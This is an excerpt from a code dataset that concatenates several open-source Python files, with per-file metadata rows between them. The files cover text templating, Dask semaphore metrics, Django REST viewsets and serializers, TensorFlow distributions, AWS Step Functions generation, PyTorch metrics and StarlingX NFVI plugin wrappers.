This text will be kept as-is.
---
Calling replace_text("animal", "octocat") will cause the string
"<<<animal>>>" to be replaced with the string "octocat"
"""
def __init__(self, text, replacements=None, remove_modelines=5):
"""
Creates a File object from a string representing the contents of a file,
and, optionally, a list of replacements to be done on the file.
Replacements are in the form that is taken be File.replace()
"""
self.init_text = text
self.text = self.init_text
if replacements is not None:
self.replace(replacements)
if remove_modelines > 0:
self.remove_modelines(remove_modelines)
def replace(self, replacements):
"""
Take a list of multiple replacements, and perform all of them. If you
just want to do one replacement, do not use this function!
The list of replacements is in the format of:
[
["function_name", "key", "replacement/file"],
...
]
Where function_name is the name of any text replacement function
(currently "replace_text", "replace_file", "insert_text", or
"insert_file"), "key" is the tag to be replaced (without the enclosing
angle brackets, and "replacement/file" is the text or filename that the
tag will be replaced with.
"""
actions = {
"replace_text": self.replace_text,
"replace_file": self.replace_file,
"insert_text": self.insert_text,
"insert_file": self.insert_file
}
for replacement in replacements:
actions[replacement[0]](replacement[1], replacement[2])
def replace_text(self, key, text):
"""
Replace a tag with a string
key is the tag to be replaced, without the enclosing angle brackets
text is the string to replace it with
"""
Logger.debug("Replacing tag {0} with \"{1}\"...".format(key, text[:45].replace("\n", "\\n")))
replace_text = "<<<{}>>>".format(key)
self.text = self.text.replace(replace_text, text)
def replace_file(self, key, file_name):
"""
Replace a tag with the contents of a file
key is the tag to be replaced, without the enclosing angle brackets
file_name is name of the file that it will be replaced with
"""
Logger.debug("Replacing tag {0} with file {1}".format(key, file_name))
self.replace_text(key, open(file_name).read())
def insert_text(self, key, text):
"""
Insert text directly after a tag
This assumes that the tag is the last thing on a line. For example:
good:
//<<<tag>>>
bad:
/*
stuff
<<<tag>>>*/
key is the tag to be replaced, without the enclosing angle brackets
text is the string that will be inserted
"""
Logger.debug("Inserting \"{1}\"... at tag {0}".format(key, text[:45].replace("\n", "\\n")))
replace_text = "<<<{}>>>".format(key)
if self.text.find(replace_text) != -1:
insert_at = self.text.find(replace_text) + len(replace_text) + 1 # Next line
self.text = self.text[:insert_at] + text + "\n" + self.text[insert_at:]
def insert_file(self, key, file_name):
"""
Insert a file directly after a tag
This assumes that the tag is the last thing on a line. For example:
good:
//<<<tag>>>
bad:
/*
stuff
<<<tag>>>*/
key is the tag to be replaced, without the enclosing angle brackets
file_name is the name of the file that it will be replaced with
"""
Logger.debug("Inserting file {1} at tag {0}".format(key, file_name))
self.insert_text(key, open(file_name).read())
def remove_modelines(self, n=5):
Logger.debug("Removing modelines from file (Searching first {} lines)".format(n))
line_num = 1
output_lines = []
modeline_regex = re.compile(r"(\A|$)((//)|#)\s*vim\s*:[^:]+:")
for line in self.text.split("\n"):
if not (modeline_regex.match(line) and line_num <= n):
output_lines.append(line)
line_num += 1
self.text = "\n".join(output_lines)
| 33.510638
| 101
| 0.591111
|
aac467b66cc102d15e706652fffb0542ad02156a
| 3,224
|
py
|
Python
|
distributed/http/scheduler/prometheus/semaphore.py
|
cameron16/distributed
|
fd611cb032d4161b20a8e9a500e9b76c9ef2c17c
|
[
"BSD-3-Clause"
] | null | null | null |
distributed/http/scheduler/prometheus/semaphore.py
|
cameron16/distributed
|
fd611cb032d4161b20a8e9a500e9b76c9ef2c17c
|
[
"BSD-3-Clause"
] | null | null | null |
distributed/http/scheduler/prometheus/semaphore.py
|
cameron16/distributed
|
fd611cb032d4161b20a8e9a500e9b76c9ef2c17c
|
[
"BSD-3-Clause"
] | null | null | null |
class SemaphoreMetricExtension:
def __init__(self, dask_server):
self.server = dask_server
def collect(self):
from prometheus_client.core import CounterMetricFamily, GaugeMetricFamily
sem_ext = self.server.extensions["semaphores"]
semaphore_max_leases_family = GaugeMetricFamily(
"semaphore_max_leases",
"Maximum leases allowed per semaphore, this will be constant for each semaphore during its lifetime.",
labels=["name"],
)
semaphore_active_leases_family = GaugeMetricFamily(
"semaphore_active_leases",
"Amount of currently active leases per semaphore.",
labels=["name"],
)
semaphore_pending_leases = GaugeMetricFamily(
"semaphore_pending_leases",
"Amount of currently pending leases per semaphore.",
labels=["name"],
)
semaphore_acquire_total = CounterMetricFamily(
"semaphore_acquire_total",
"Total number of leases acquired per semaphore.",
labels=["name"],
)
semaphore_release_total = CounterMetricFamily(
"semaphore_release_total",
"Total number of leases released per semaphore.\n"
"Note: if a semaphore is closed while there are still leases active, this count will not equal "
"`semaphore_acquired_total` after execution.",
labels=["name"],
)
semaphore_average_pending_lease_time = GaugeMetricFamily(
"semaphore_average_pending_lease_time",
"Exponential moving average of the time it took to acquire a lease per semaphore.\n"
"Note: this only includes time spent on scheduler side, "
"it does"
" not include time spent on communication.\n"
"Note: this average is calculated based on order of leases instead of time of lease acquisition.",
labels=["name"],
unit="s",
)
for semaphore_name, semaphore_max_leases in sem_ext.max_leases.items():
semaphore_max_leases_family.add_metric(
[semaphore_name], semaphore_max_leases
)
semaphore_active_leases_family.add_metric(
[semaphore_name], len(sem_ext.leases[semaphore_name])
)
semaphore_pending_leases.add_metric(
[semaphore_name], sem_ext.metrics["pending"][semaphore_name]
)
semaphore_acquire_total.add_metric(
[semaphore_name], sem_ext.metrics["acquire_total"][semaphore_name]
)
semaphore_release_total.add_metric(
[semaphore_name], sem_ext.metrics["release_total"][semaphore_name]
)
semaphore_average_pending_lease_time.add_metric(
[semaphore_name],
sem_ext.metrics["average_pending_lease_time"][semaphore_name],
)
yield semaphore_max_leases_family
yield semaphore_active_leases_family
yield semaphore_pending_leases
yield semaphore_acquire_total
yield semaphore_release_total
yield semaphore_average_pending_lease_time
| 41.87013
| 114
| 0.634926
|
d74655eba30a9edb904558651d26bc7d3a619e22
| 2,147
|
py
|
Python
|
apps/api/views/case_views.py
|
ranyong1997/Sakura_Infinity
|
700c3e8497077b266958f1d26525469d1f0cd87f
|
[
"MIT"
] | 1
|
2022-03-24T05:33:30.000Z
|
2022-03-24T05:33:30.000Z
|
apps/api/views/case_views.py
|
ranyong1997/Sakura_Infinity
|
700c3e8497077b266958f1d26525469d1f0cd87f
|
[
"MIT"
] | null | null | null |
apps/api/views/case_views.py
|
ranyong1997/Sakura_Infinity
|
700c3e8497077b266958f1d26525469d1f0cd87f
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from rest_framework import filters
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework import viewsets
from rest_framework.permissions import IsAuthenticated
from ..permissions import IsOwnerOrReadOnly
from rest_framework.authentication import SessionAuthentication, BasicAuthentication
from element.models import Case
from api.serializers import CaseListSerializer, CaseSerializer
from util.jsresponse import JsResponse
class CaseViewSet(viewsets.ModelViewSet):
"""
用列信息接口
"""
permission_classes = (IsAuthenticated, IsOwnerOrReadOnly)
queryset = Case.objects.all()
serializer_class = CaseSerializer
# 设置三大常用过滤器之DjangoFilterBackend, SearchFilter
filter_backends = (DjangoFilterBackend, filters.SearchFilter, filters.OrderingFilter)
# # 查询过滤
search_fields = ('moduleid__module_name', 'title', 'casename', 'isdone', 'maintainer',)
# 'moduleid__projcet__project_name', 项目名称
# 外键上级 moduleid__projcet / moduleid外键
# 选择过滤
filter_fields = ('moduleid__projcet', 'moduleid', 'title', 'casename', 'isdone', 'maintainer',)
# 重写 序列化返回类
def get_serializer_class(self):
if self.action == 'list':
return CaseListSerializer
else:
return CaseSerializer
def create(self, request, *args, **kwargs):
# 判断用列是否重复
is_title = Case.objects.filter(moduleid=request.data['moduleid'], title=request.data['title']).count()
if is_title:
print("用列已经存在")
return JsResponse(data=[], msg="用列已经存在", code=300)
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
data = serializer.data
print("新增用列成功")
return JsResponse(data=data, msg="新增用列成功", headers=headers, code=200)
def destroy(self, request, *args, **kwargs):
instance = self.get_object()
self.perform_destroy(instance)
print("删除成功")
return JsResponse(data=[], msg="删除成功", code=200)
| 32.530303
| 110
| 0.701444
|
28b27029a6b705de9f59ec4b3540702778c1f686
| 2,036
|
py
|
Python
|
flipsidegram/images/serializers.py
|
flipsid2/flipsidegram
|
fd4ca676872a04c2bd527faa391d2b0a992ce1c4
|
[
"MIT"
] | null | null | null |
flipsidegram/images/serializers.py
|
flipsid2/flipsidegram
|
fd4ca676872a04c2bd527faa391d2b0a992ce1c4
|
[
"MIT"
] | null | null | null |
flipsidegram/images/serializers.py
|
flipsid2/flipsidegram
|
fd4ca676872a04c2bd527faa391d2b0a992ce1c4
|
[
"MIT"
] | null | null | null |
from rest_framework import serializers
from taggit_serializer.serializers import (TagListSerializerField,
TaggitSerializer)
from . import models
from flipsidegram.users import models as user_models
class SmallImageSerializer(serializers.ModelSerializer):
""" Used for the notifications """
class Meta:
model = models.Image
fields = (
'file',
)
class CountImageSerializer(serializers.ModelSerializer):
class Meta:
model = models.Image
fields = (
'id',
'file',
'comment_count',
'like_count'
)
class FeedUserSerializer(serializers.ModelSerializer):
class Meta:
model = user_models.User
fields = (
'username',
'profile_image'
)
class CommentSerializer(serializers.ModelSerializer):
creator = FeedUserSerializer(read_only=True)
class Meta:
model = models.Comment
fields = (
'id',
'message',
'creator'
)
class LikeSerializer(serializers.ModelSerializer):
class Meta:
model = models.Like
fields = '__all__'
class ImageSerializer(TaggitSerializer, serializers.ModelSerializer):
comments = CommentSerializer(many=True)
creator = FeedUserSerializer()
tags = TagListSerializerField()
class Meta:
model = models.Image
fields = (
'id',
'file',
'location',
'caption',
'comments',
'like_count',
'creator',
'tags',
'created_at'
)
class LikeSerializer(serializers.ModelSerializer):
class Meta:
model = models.Like
fields = (
'creator',
)
class InputImageSerializer(serializers.ModelSerializer):
class Meta:
model = models.Image
fields = (
'file',
'location',
'caption',
)
| 20.565657
| 69
| 0.557466
|
15ffeaa8fbc745b677e9821a8c42f316cfae3c33
| 11,231
|
py
|
Python
|
heaviside/sfn.py
|
jhuapl-boss/heaviside
|
481b232864438a91458f1932ca70fe27476e2846
|
[
"Apache-2.0"
] | 36
|
2017-01-27T21:28:50.000Z
|
2022-03-15T12:29:01.000Z
|
heaviside/sfn.py
|
jhuapl-boss/heaviside
|
481b232864438a91458f1932ca70fe27476e2846
|
[
"Apache-2.0"
] | 10
|
2017-05-03T17:15:30.000Z
|
2021-01-07T22:55:08.000Z
|
heaviside/sfn.py
|
jhuapl-boss/heaviside
|
481b232864438a91458f1932ca70fe27476e2846
|
[
"Apache-2.0"
] | 13
|
2017-05-18T15:02:10.000Z
|
2021-07-27T23:09:54.000Z
|
# Copyright 2020 The Johns Hopkins University Applied Physics Laboratory
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import json
from collections import OrderedDict
import iso8601 # parser for timestamp format
from .ast import ASTStateChoice, ASTCompOp, ASTCompNot, ASTCompAndOr, ASTValue, ASTModNext, ASTStepFunction
class Timestamp(object):
"""Wrapper around a timestamp string.
Used to determine if a string is in a valid timestamp format and type it
for the parser
"""
def __init__(self, timestamp):
"""
Args:
timestamp (string): Timestamp string
Exceptions:
An exception is thrown if the string is not a valid timestamp
"""
iso8601.parse_date(timestamp)
self.timestamp = timestamp
def __str__(self):
return self.timestamp
def __repr__(self):
return "Timestamp({!r})".format(self.timestamp)
class _StateMachineEncoder(json.JSONEncoder):
"""Custom JSONEncoder that handles the Timestamp type"""
def default(self, o):
if type(o) == Timestamp:
return str(o)
return super(_StateMachineEncoder, self).default(o)
class Branch(dict):
def __init__(self, ast):
super(Branch, self).__init__()
# Makes states be dumped in the same order they were added
# making it easier to read the output and match it to the input
self['States'] = OrderedDict()
for state in ast.states:
self['States'][state.name] = State(state)
self['StartAt'] = ast.states[0].name
class StepFunction(Branch):
def __init__(self, ast):
super(StepFunction, self).__init__(ast)
if ast.comment is not None:
self['Comment'] = ast.comment.value
if ast.version is not None:
self['Version'] = ast.version.value.value
if ast.timeout is not None:
self['TimeoutSeconds'] = ast.timeout.value.value
def definition(self, **kwargs):
"""Dump the state machine into the JSON format needed by AWS
Args:
kwargs (dict): Arguments passed to json.dumps()
"""
kwargs.setdefault('ensure_ascii', False) # Allow Unicode in the output by default
return json.dumps(self, cls=_StateMachineEncoder, **kwargs)
class State(dict):
def __init__(self, ast):
super(State, self).__init__()
self['Type'] = ast.state_type
# Generic Modifiers for all States
if ast.comment is not None:
# No longer a token, parsed by AST class into name/comment
self['Comment'] = ast.comment
if ast.timeout is not None:
timeout = ast.timeout.value.value
self['TimeoutSeconds'] = timeout
else:
timeout = 60 # default
if ast.heartbeat is not None:
heartbeat = ast.heartbeat.value.value
if not heartbeat < timeout:
ast.heartbeat.raise_error("Heartbeat must be less than timeout (defaults to 60)")
self['HeartbeatSeconds'] = heartbeat
if ast.input is not None:
self['InputPath'] = ast.input.value.value
if ast.result is not None:
self['ResultPath'] = ast.result.value.value
if ast.output is not None:
self['OutputPath'] = ast.output.value.value
if ast.data is not None:
self['Result'] = ast.data.value
if ast.catch is not None:
self['Catch'] = []
for catch in ast.catch:
self['Catch'].append(Catch(catch))
if ast.retry is not None:
self['Retry'] = []
for retry in ast.retry:
self['Retry'].append(Retry(retry))
if ast.iterator is not None:
# The iterator contains a separate state machine that runs on each
# element of the input array.
substates = [b for b in ast.iterator.states]
self['Iterator'] = StepFunction(ASTStepFunction(None, None, None, substates))
if ast.items_path is not None:
self['ItemsPath'] = ast.items_path.value.value
if ast.max_concurrency is not None:
max_con = ast.max_concurrency.value.value
if max_con < 0:
ast.max_concurrency.raise_error("max_concurrency must be non-negative")
self['MaxConcurrency'] = max_con
# State specific arguments
if ast.state_type == 'Fail':
self['Error'] = ast.error.value
self['Cause'] = ast.cause.value
if ast.state_type == 'Pass' or ast.state_type == 'Map':
if ast.parameters is not None:
self['Parameters'] = Parameters(ast.parameters)
if ast.state_type == 'Task':
self['Resource'] = ast.arn
if ast.parameters is not None:
self['Parameters'] = Parameters(ast.parameters)
if ast.state_type == 'Wait':
key = ''.join([t.capitalize() for t in ast.type.value.split('_')])
self[key] = ast.val.value
if ast.state_type == 'Choice':
key = ASTStateChoice.DEFAULT
if key in ast.branches:
self['Default'] = ast.branches[key]
del ast.branches[key]
self['Choices'] = []
for comp in ast.branches:
self['Choices'].append(Choice(comp, ast.branches[comp]))
if ast.state_type == 'Parallel':
self['Branches'] = []
for branch in ast.branches:
self['Branches'].append(Branch(branch))
if ast.next is not None:
if isinstance(ast.next, ASTModNext):
self['Next'] = ast.next.value
else:
self['Next'] = ast.next
if ast.end:
self['End'] = ast.end
class Catch(dict):
def __init__(self, ast):
super(Catch, self).__init__()
errors = ast.errors
# Support a single string for error type
# ??? put this transformation in AST
if type(errors) != list:
errors = [errors]
if len(errors) == 0:
errors = [ASTValue('States.ALL', None)]
self['ErrorEquals'] = [e.value for e in errors]
self['Next'] = ast.next
if ast.path is not None:
self['ResultPath'] = ast.path.value
class Retry(dict):
def __init__(self, ast):
super(Retry, self).__init__()
errors = ast.errors
# Support a single string for error type
# ??? put this transformation in AST
if type(errors) != list:
errors = [errors]
if len(errors) == 0:
errors = [ASTValue('States.ALL', None)]
if float(ast.backoff.value) < 1.0:
ast.backoff.raise_error("Backoff rate should be >= 1.0")
self['ErrorEquals'] = [e.value for e in errors]
self['IntervalSeconds'] = ast.interval.value
self['MaxAttempts'] = ast.max.value
self['BackoffRate'] = float(ast.backoff.value)
def Parameters(ast):
rst = OrderedDict()
for k,v in ast.items():
# Keys are ASTValues and need to have the actual value unwrapped
# Values are already raw values as they are JSON Text
rst[k.value] = v
return rst
COMPARISON = {
'==': {
str: 'StringEquals',
int: 'NumericEquals',
float: 'NumericEquals',
bool: 'BooleanEquals',
Timestamp: 'TimestampEquals',
},
'<': {
str: 'StringLessThan',
int: 'NumericLessThan',
float: 'NumericLessThan',
Timestamp: 'TimestampLessThan',
},
'>': {
str: 'StringGreaterThan',
int: 'NumericGreaterThan',
float: 'NumericGreaterThan',
Timestamp: 'TimestampGreaterThan',
},
'<=': {
str: 'StringLessThanEquals',
int: 'NumericLessThanEquals',
float: 'NumericLessThanEquals',
Timestamp: 'TimestampLessThanEquals',
},
'>=': {
str: 'StringGreaterThanEquals',
int: 'NumericGreaterThanEquals',
float: 'NumericGreaterThanEquals',
Timestamp: 'TimestampGreaterThanEquals',
},
}
try:
for op in COMPARISON.keys():
COMPARISON[op][unicode] = COMPARISON[op][str]
except NameError:
pass # Support Python2 Unicode string type
def Choice(ast, target=None):
if type(ast) == ASTCompOp:
var = ast.var.value
val = ast.val.value
op = ast.op.value
op_type = type(val) # The type of the operator is based on the value type
try:
if op == '!=':
op = COMPARISON['=='][op_type]
choice = OpChoice(var, op, val)
return NotChoice(choice, target)
else:
op = COMPARISON[op][op_type]
return OpChoice(var, op, val, target)
except KeyError:
msg = "Cannot make '{}' comparison with type '{}'".format(op, op_type)
ast.raise_error(msg)
elif type(ast) == ASTCompNot:
return NotChoice(Choice(ast.comp), target)
elif isinstance(ast, ASTCompAndOr):
return AndOrChoice(ast, target)
else:
ast.raise_error("Comparison support not implemented yet")
class OpChoice(dict):
"""A ChoiceState Choice wrapping a comparison and reference to state to execute"""
def __init__(self, var, op, val, target=None):
super(OpChoice, self).__init__(Variable = var)
self.op = op # for __str__ / __repr__
self[self.op] = val
if target is not None:
self['Next'] = target
def __str__(self):
return repr(self)
def __repr__(self):
return "({} {} {})".format(self['Variable'], self.op, self[self.op])
class NotChoice(dict):
"""Wraper around a Choice that negates the Choice"""
def __init__(self, comp, target=None):
super(NotChoice, self).__init__(Not = comp)
if target is not None:
self['Next'] = target
def __str__(self):
return repr(self)
def __repr__(self):
return "(Not {!r})".format(self['Not'])
class AndOrChoice(dict):
"""Wrapper arounds a list of Choices and 'and's or 'or's the results together"""
def __init__(self, ast, target=None):
super(AndOrChoice, self).__init__()
self.op = ast.op # for __str__ / __repr__
self[self.op] = [Choice(comp) for comp in ast.comps]
if target is not None:
self['Next'] = target
def __str__(self):
return repr(self)
def __repr__(self):
vals = map(repr, self[self.op])
return "(" + (" {} ".format(self.op.lower())).join(vals) + ")"
| 31.371508
| 107
| 0.590954
|
8eba515d20b05887befb9ca97672bfad36cb65f9
| 2,320
|
py
|
Python
|
scripts/common/metrics.py
|
Vasyka/DeepGQuad
|
772a461732fc4044a1dee84d2688bf16960e272c
|
[
"Apache-2.0"
] | null | null | null |
scripts/common/metrics.py
|
Vasyka/DeepGQuad
|
772a461732fc4044a1dee84d2688bf16960e272c
|
[
"Apache-2.0"
] | 5
|
2020-11-13T18:54:36.000Z
|
2021-09-08T02:06:06.000Z
|
scripts/common/metrics.py
|
Vasyka/DeepGQuad
|
772a461732fc4044a1dee84d2688bf16960e272c
|
[
"Apache-2.0"
] | null | null | null |
import torch
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.metrics import *
import seaborn as sns
sns.set()
# Accuracy
# def binary_acc(y_pred, y_test):
# y_pred_tag = torch.round(y_pred)
# correct_results_sum = (y_pred_tag == y_test).sum().float()
# acc = correct_results_sum/y_test.shape[0]
# acc = torch.round(acc * 100)
# return acc
def binary_acc(y_pred, y_test):
y_pred_tag = torch.round(y_pred)
correct_results_sum = (y_pred_tag.view(-1) == y_test.view(-1)).sum().float()
#print((y_pred_tag.view(-1) == y_test.view(-1)).size())
#print(correct_results_sum)
acc = correct_results_sum/y_test.view(-1).shape[0]
acc = torch.round(acc * 100)
return acc
# Accurate plotting of confusion matrix and full report of classification metrics
def plot_conf_matrix(y_true, y_pred):
print(classification_report(y_true, y_pred))
cf = pd.DataFrame(confusion_matrix(y_true, y_pred))
ax= plt.subplot()
plt.figure(figsize=(10,10))
sns.set(font_scale=1.4)
sns.heatmap(cf, annot=True, ax = ax,cmap='Blues',fmt='d')
ax.set_ylabel('Actual')
ax.set_xlabel('Predicted')
ax.set_ylim([0,2])
# Intersection over Union for object detection
def inter_over_union_simple(y_pred, y_test, smooth = 1):
intersection = torch.min(y_pred, y_test)
union = y_pred + y_test - intersection
iou = torch.mean(intersection/union)
return iou * 100
# Intersection over Union for segmentation
def inter_over_union(y_pred, y_test, smooth = 1):
y_pred_tag = torch.round(y_pred)
conf_matrix = confusion_matrix(y_pred_tag.view(-1).cpu().detach().numpy(),y_test.view(-1).cpu().detach().numpy())
#print(conf_matrix)
intersection = np.diag(conf_matrix)
predicted = conf_matrix.sum(axis = 1)
target = conf_matrix.sum(axis = 0)
union = predicted + target - intersection
iou = np.mean(intersection/union)
return iou * 100
# Dice coefficient
def dice_coef(y_pred, y_test, criterion, epsilon=1e-6):
numerator = 2. * torch.sum(y_pred_thr * y_test, 1) + epsilon
#denominator = torch.sum(torch.square(y_pred) + torch.square(y_test), 1)
denominator = torch.sum(y_pred + y_test,1)
return 1 - torch.mean(numerator / (denominator + epsilon)) + criterion(y_pred, y_test)
| 33.142857
| 117
| 0.69569
|
1ec81cee374e638e8b16a21c06068a2328179d40
| 3,527
|
py
|
Python
|
src/garage/tf/distributions/recurrent_categorical.py
|
arbenton/garage
|
5c398255fbfae375370483f18216996d82590a88
|
[
"MIT"
] | 1
|
2020-01-05T14:57:43.000Z
|
2020-01-05T14:57:43.000Z
|
src/garage/tf/distributions/recurrent_categorical.py
|
lywong92/garage
|
96cb8887fcae90531a645d540653010e7fe10fcc
|
[
"MIT"
] | null | null | null |
src/garage/tf/distributions/recurrent_categorical.py
|
lywong92/garage
|
96cb8887fcae90531a645d540653010e7fe10fcc
|
[
"MIT"
] | 1
|
2020-02-05T00:34:07.000Z
|
2020-02-05T00:34:07.000Z
|
import numpy as np
import tensorflow as tf
from garage.tf.distributions.base import Distribution
from garage.tf.distributions.categorical import Categorical
TINY = 1e-8
class RecurrentCategorical(Distribution):
def __init__(self, dim, name='RecurrentCategorical'):
self._cat = Categorical(dim, name)
self._dim = dim
self._name = name
@property
def dim(self):
return self._dim
def kl_sym(self, old_dist_info_vars, new_dist_info_vars, name=None):
"""
Compute the symbolic KL divergence of two categorical distributions
"""
with tf.name_scope(name, 'kl_sym',
[old_dist_info_vars, new_dist_info_vars]):
old_prob_var = old_dist_info_vars['prob']
new_prob_var = new_dist_info_vars['prob']
# Assume layout is N * T * A
return tf.reduce_sum(
old_prob_var *
(tf.log(old_prob_var + TINY) - tf.log(new_prob_var + TINY)),
axis=2)
def kl(self, old_dist_info, new_dist_info):
"""
Compute the KL divergence of two categorical distributions
"""
old_prob = old_dist_info['prob']
new_prob = new_dist_info['prob']
return np.sum(
old_prob * (np.log(old_prob + TINY) - np.log(new_prob + TINY)),
axis=2)
def likelihood_ratio_sym(self,
x_var,
old_dist_info_vars,
new_dist_info_vars,
name=None):
with tf.name_scope(name, 'likelihood_ratio_sym',
[x_var, old_dist_info_vars, new_dist_info_vars]):
old_prob_var = old_dist_info_vars['prob']
new_prob_var = new_dist_info_vars['prob']
# Assume layout is N * T * A
a_dim = tf.shape(x_var)[2]
flat_ratios = self._cat.likelihood_ratio_sym(
tf.reshape(x_var, tf.stack([-1, a_dim])),
dict(prob=tf.reshape(old_prob_var, tf.stack([-1, a_dim]))),
dict(prob=tf.reshape(new_prob_var, tf.stack([-1, a_dim]))))
return tf.reshape(flat_ratios, tf.shape(old_prob_var)[:2])
def entropy(self, dist_info):
probs = dist_info['prob']
return -np.sum(probs * np.log(probs + TINY), axis=2)
def entropy_sym(self, dist_info_vars, name=None):
with tf.name_scope(name, 'entropy_sym', [dist_info_vars]):
probs = dist_info_vars['prob']
return -tf.reduce_sum(probs * tf.log(probs + TINY), 2)
def log_likelihood_sym(self, xs, dist_info_vars, name=None):
with tf.name_scope(name, 'log_likelihood_sym', [xs, dist_info_vars]):
probs = dist_info_vars['prob']
# Assume layout is N * T * A
a_dim = tf.shape(probs)[2]
flat_logli = self._cat.log_likelihood_sym(
tf.reshape(xs, tf.stack([-1, a_dim])),
dict(prob=tf.reshape(probs, tf.stack((-1, a_dim)))))
return tf.reshape(flat_logli, tf.shape(probs)[:2])
def log_likelihood(self, xs, dist_info):
probs = dist_info['prob']
# Assume layout is N * T * A
a_dim = tf.shape(probs)[2]
flat_logli = self._cat.log_likelihood_sym(
xs.reshape((-1, a_dim)), dict(prob=probs.reshape((-1, a_dim))))
return flat_logli.reshape(probs.shape[:2])
@property
def dist_info_specs(self):
return [('prob', (self.dim, ))]
| 38.758242
| 77
| 0.581798
|
caa27ac05d36c4b5b4175c4462e181868e246451
| 17,360
|
py
|
Python
|
nfv/nfv-vim/nfv_vim/nfvi/_nfvi_infrastructure_module.py
|
starlingx/nfv
|
849c386e84911af0ac8d0df815f911347b39f8d6
|
[
"Apache-2.0"
] | 2
|
2020-02-07T19:01:36.000Z
|
2022-02-23T01:41:46.000Z
|
nfv/nfv-vim/nfv_vim/nfvi/_nfvi_infrastructure_module.py
|
starlingx/nfv
|
849c386e84911af0ac8d0df815f911347b39f8d6
|
[
"Apache-2.0"
] | 1
|
2021-01-14T12:02:25.000Z
|
2021-01-14T12:02:25.000Z
|
nfv/nfv-vim/nfv_vim/nfvi/_nfvi_infrastructure_module.py
|
starlingx/nfv
|
849c386e84911af0ac8d0df815f911347b39f8d6
|
[
"Apache-2.0"
] | 2
|
2021-01-13T08:39:21.000Z
|
2022-02-09T00:21:55.000Z
|
#
# Copyright (c) 2015-2021 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
from nfv_common import debug
from nfv_vim.nfvi._nfvi_infrastructure_plugin import NFVIInfrastructurePlugin
DLOG = debug.debug_get_logger('nfv_vim.nfvi.nfvi_infrastructure_module')
_infrastructure_plugin = None
def nfvi_get_datanetworks(host_uuid, callback):
"""
Get host data network information
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_datanetworks',
host_uuid,
callback=callback)
return cmd_id
def nfvi_get_system_info(callback):
"""
Get information about the system
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_system_info',
callback=callback)
return cmd_id
def nfvi_get_system_state(callback):
"""
Get the state of the system
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_system_state',
callback=callback)
return cmd_id
def nfvi_get_hosts(callback):
"""
Get a list of hosts
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_hosts',
callback=callback)
return cmd_id
def nfvi_get_host(host_uuid, host_name, callback):
"""
Get host details
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_host',
host_uuid, host_name,
callback=callback)
return cmd_id
def nfvi_get_host_devices(host_uuid, host_name, callback):
"""
Get host device list details
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_host_devices',
host_uuid, host_name,
callback=callback)
return cmd_id
def nfvi_get_host_device(host_uuid, host_name, device_uuid, device_name, callback):
"""
Get host device details
"""
cmd_id = _infrastructure_plugin.invoke_plugin('get_host_device',
host_uuid, host_name,
device_uuid, device_name,
callback=callback)
return cmd_id
def nfvi_host_device_image_update(host_uuid, host_name, callback):
"""
Update host device image
"""
cmd_id = _infrastructure_plugin.invoke_plugin('host_device_image_update',
host_uuid, host_name,
callback=callback)
return cmd_id
def nfvi_host_device_image_update_abort(host_uuid, host_name, callback):
"""
Abort host device image update
"""
cmd_id = _infrastructure_plugin.invoke_plugin('host_device_image_update_abort',
host_uuid, host_name,
callback=callback)
return cmd_id
def nfvi_kube_host_upgrade_control_plane(host_uuid, host_name, force, callback):
"""
Kube Host Upgrade Control Plane
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'kube_host_upgrade_control_plane',
host_uuid,
host_name,
force,
callback=callback)
return cmd_id
def nfvi_kube_host_upgrade_kubelet(host_uuid, host_name, force, callback):
"""
Kube Host Upgrade Kubelet
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'kube_host_upgrade_kubelet',
host_uuid,
host_name,
force,
callback=callback)
return cmd_id
def nfvi_kube_rootca_update_complete(callback):
"""Kube RootCA Update - Complete"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'kube_rootca_update_complete',
callback=callback)
return cmd_id
def nfvi_kube_rootca_update_generate_cert(expiry_date, subject, callback):
"""Kube RootCA Update - Generate Cert"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'kube_rootca_update_generate_cert',
expiry_date=expiry_date,
subject=subject,
callback=callback)
return cmd_id
def nfvi_kube_rootca_update_host(host_uuid, host_name, update_type, callback):
"""Kube RootCA Update - Host"""
cmd_id = _infrastructure_plugin.invoke_plugin('kube_rootca_update_host',
host_uuid,
host_name,
update_type,
callback=callback)
return cmd_id
def nfvi_kube_rootca_update_pods(phase, callback):
"""Kube RootCA Update - Pods for a particular phase"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'kube_rootca_update_pods',
phase,
callback=callback)
return cmd_id
def nfvi_kube_rootca_update_start(force, alarm_ignore_list, callback):
"""Kube RootCA Update - Start"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'kube_rootca_update_start',
force=force,
alarm_ignore_list=alarm_ignore_list,
callback=callback)
return cmd_id
def nfvi_kube_rootca_update_upload_cert(cert_file, callback):
"""Kube RootCA Update - Upload Cert"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'kube_rootca_update_upload_cert',
cert_file=cert_file,
callback=callback)
return cmd_id
def nfvi_kube_upgrade_cleanup(callback):
"""
Kube Upgrade Cleanup
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'kube_upgrade_cleanup',
callback=callback)
return cmd_id
def nfvi_kube_upgrade_complete(callback):
"""
Kube Upgrade Complete
"""
cmd_id = _infrastructure_plugin.invoke_plugin(
'kube_upgrade_complete',
callback=callback)
return cmd_id
def nfvi_kube_upgrade_download_images(callback):
"""
Kube Upgrade Download Images
"""
